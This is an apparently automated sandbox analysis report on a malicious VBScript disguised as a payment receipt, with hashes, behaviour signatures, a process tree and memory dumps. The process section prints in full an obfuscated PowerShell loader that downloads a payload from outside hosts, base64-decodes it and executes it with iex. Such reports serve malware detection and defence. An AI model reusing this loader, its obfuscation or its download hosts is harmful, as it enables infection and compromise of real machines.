Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2024 15:28

General

  • Target

    0702/Payment_Confirmation_Receipts.vbs

  • Size

    26KB

  • MD5

    a374d1c2025292c43a4a717292441c1f

  • SHA1

    a240c65ec043d5f745fc5a79a4e2c7059b2c9caa

  • SHA256

    7d22fe443fda8fe46e84c8a0355ade3c03e506a016432a942345311f9862981d

  • SHA512

    9e16aca8d2453c06e184d40f87b3477b96d2e2c1e59ce4c979a506ac7e9e7b4e15f3bb2de9df105e9b6445dbe1b8a4eb2344c5ad608998204b9603c9eb2b819a

  • SSDEEP

    384:+lzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww0Dsol9FWZkM:mzSR022X/523S0e8xPPmXsKFWZUaGM

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0702\Payment_Confirmation_Receipts.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Spirocheticide Blokdiagrammernes Ufuldstndighederne Bottomless Tjekkerens Almindelig Uappetitligt Talstrkeres Sammensvrge Panoplies Superinferring Malkonduiten131 Lorilet Subnubilar71 Mageskiftet Unlicked93 veludfrt Fejlagtiges Vaadomraader Psykofysik Recognise Deklamationen Understaar Forestillings Spirocheticide Blokdiagrammernes Ufuldstndighederne Bottomless Tjekkerens Almindelig Uappetitligt Talstrkeres Sammensvrge Panoplies Superinferring Malkonduiten131 Lorilet Subnubilar71 Mageskiftet Unlicked93 veludfrt Fejlagtiges Vaadomraader Psykofysik Recognise Deklamationen Understaar Forestillings';If (${host}.CurrentCulture) {$Endomorphism++;}Function Disequalises($Metastasere){$Helbreder=$Metastasere.Length-$Endomorphism;$flytteforretningerne='SUBsTRI';$flytteforretningerne+='ng';For( $Modarbejdet=1;$Modarbejdet -lt $Helbreder;$Modarbejdet+=2){$Spirocheticide+=$Metastasere.$flytteforretningerne.Invoke( $Modarbejdet, $Endomorphism);}$Spirocheticide;}function Sadduker($Portrtters){ & ($Professionalismes) ($Portrtters);}$Tyrekalvens=Disequalises 'TMCoszSi l.l aS/P5 .U0E A(KW iSn d.o w sU ONRT, 1A0P.H0 ; W i n,6 4P; ,xF6 4 ;C r vF:I1 2a1N. 0p) PG eHcKk oR/m2F0 1 0 0N1R0.1K UFOiRr.e f oLxP/ 1N2,1 .,0 ';$Standardvedtgtens=Disequalises '.USs e r -.ASg.eVn t ';$Tjekkerens=Disequalises 'Ph t t p,:K/P/B1 0B3B.F1.9,5 . 2 3A7 . 4K3P/CA,a r sBbRe r e tSn iCnDg sS. j pPb.>,hOtBtTp,s.: / / mbi lTa nOaSc eWsS. cAoSm,/TAOa.r s b eHrPe t nuiOnHg.s . jBpBb ';$Subarration93=Disequalises ' >F ';$Professionalismes=Disequalises ' i eSxB ';$chirurgical='Talstrkeres';$Pusheres = Disequalises 'Ie c h o %NaDp pMdOaTtOa %M\ m a,nSi pKuAlSe.r,i.nYggeSrSn eIsT.Qf l e N& &I NeVc hWoP ,t ';Sadduker (Disequalises ' $ gTl o b,a l :.E xMssiscAcFa t,iDv,e =R( cUmSd, /,c. .$FPFuEs hSe.r e,sI) ');Sadduker (Disequalises '.$ gSlFo.b aAl :MB oCtGt oAm.lVe.sAs = $ T jFe,kSk.eArRe n.sA.Ss p l i t (.$ S uSb a r rPaDtTiFoOnP9.3D)W ');Sadduker (Disequalises ' [HN e tS..S eAr.v i,c,eBP.oSi nHthMSa n a g e rO]P:.:US e cPu rKiUt,yCPDrjo.t o c.o l F=, [pNTe tC..SFeLc u r i t.y PTr o t oGcMoEl.T yAp e ].: :STKlTsK1T2I ');$Tjekkerens=$Bottomless[0];$Valutacentral= (Disequalises 'T$Cg,l,oSb,aLl,: Z.e pMp e lAi nReUrUnDeM=TN.eTwR- OTb jRe c t. ,SRy,sLtSeSmN.RN eUtT.RW eFbhCPlBi e.n,t');$Valutacentral+=$Exsiccative[1];Sadduker ($Valutacentral);Sadduker (Disequalises 'M$PZ e,p p.e,laiEn,eSr,nIeS.JHMeUaSdLeFrVs [L$fSCt a nPd asrIdBv eSdBt,gUtUeTnSs ] =S$ T y,rAe,ksa.lKv e n s ');$Flagships=Disequalises ',$PZte p,pTe.l iFnUe rBnIeU. D oSwBnHlIoraSdHF,i.lTeM(M$ST j eAk kUeVrLeBn.s., $ DBeSkIlUaHm.a t,iTo n eCn,)k ';$Deklamationen=$Exsiccative[0];Sadduker (Disequalises '.$Pg l oPb aNlC:FH uMnSkPnBs,v.s nSe,rHn.eS=S(,T e sPtR-PP,a t h. S$SDAe.k lBaAmNastPiRoEnReSn )K ');while (!$Hunknsvsnerne) {Sadduker (Disequalises ' $ g lKo b aUl.: Ggr a.n.uCl iPsDe,= $ntIrBu e. ') ;Sadduker $Flagships;Sadduker (Disequalises ' S tUa r t -,S,l.e,e pC ,4 ');Sadduker (Disequalises ',$.gSlSo b,aAl : HLu,nPkSn sPvTs n.e.r,n e =,( T e,sTtF-KP aStIhG U$.DPePk lSa m aMtAi obn.e nF)s ') ;Sadduker (Disequalises 'T$ gklPo.b.aSl :AU,f uplNdAs tTn.dPiUg.hceHdNe r nPe =S$ng lToTbFa lR: BVlSo kVdUi asg r aBmTmUe rRnAe sF+R+ %M$bBHoDtSt.osm l.eNsis..BcFo,uMn.tS ') ;$Tjekkerens=$Bottomless[$Ufuldstndighederne];}$Thorlejv=361448;$flovsers=25553;Sadduker (Disequalises 'D$Ug,lUoUbVaUl,:BSSa mNm.e.nPsRvSr gse. ,= EGHe.tG- CLokn tLe n,tU P$WDpeAk l a mFa.tViPoIn e,nA ');Sadduker (Disequalises 'S$Tg lRoDbgaKlD:SK aVs.s,a bFa hM ,=I .[NSPyCs tee mH.UC.o nSv e r,t.]R: :LFMr.oFmBBSaMs e,6.4 SCt,rgi n,gA(S$ S aAm.m ean.s,v rFgNeW). ');Sadduker (Disequalises 'P$.gWl o bPaDlB:CM aBl k,o n d.uTiStue n.1 3A1 S= ,[.S,yBsDt eUmC.KT,e xMtT. EHnTc o dniAnTgB] :R:HASSKC I,I .KG e,tUSSt rUi,n,g (D$ K,aFsQs,a.bDa h,)a ');Sadduker (Disequalises ',$SgSl,oMb aAlG: OSv.eIrSeGnIsOkLoFmFs tSm.s.sBicgSeT=.$NM.aAl kCo nSdSuKi t,e nL1S3,1G..s.ucb.sVtDr i nIg.(S$.TTh,o rTl.eHj vA,V$CfVlFoOvKs e r,sD)U ');Sadduker $Overenskomstmssige;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2692
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\manipuleringernes.fle && echo t"
        3⤵
          PID:2820

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\CabC0E1.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • memory/2692-20-0x000007FEF58EE000-0x000007FEF58EF000-memory.dmp

      Filesize

      4KB

    • memory/2692-23-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-22-0x00000000029F0000-0x00000000029F8000-memory.dmp

      Filesize

      32KB

    • memory/2692-24-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-21-0x000000001B560000-0x000000001B842000-memory.dmp

      Filesize

      2.9MB

    • memory/2692-25-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-26-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-27-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-28-0x000007FEF58EE000-0x000007FEF58EF000-memory.dmp

      Filesize

      4KB

    • memory/2692-29-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

      Filesize

      9.6MB

    • memory/2692-30-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

      Filesize

      9.6MB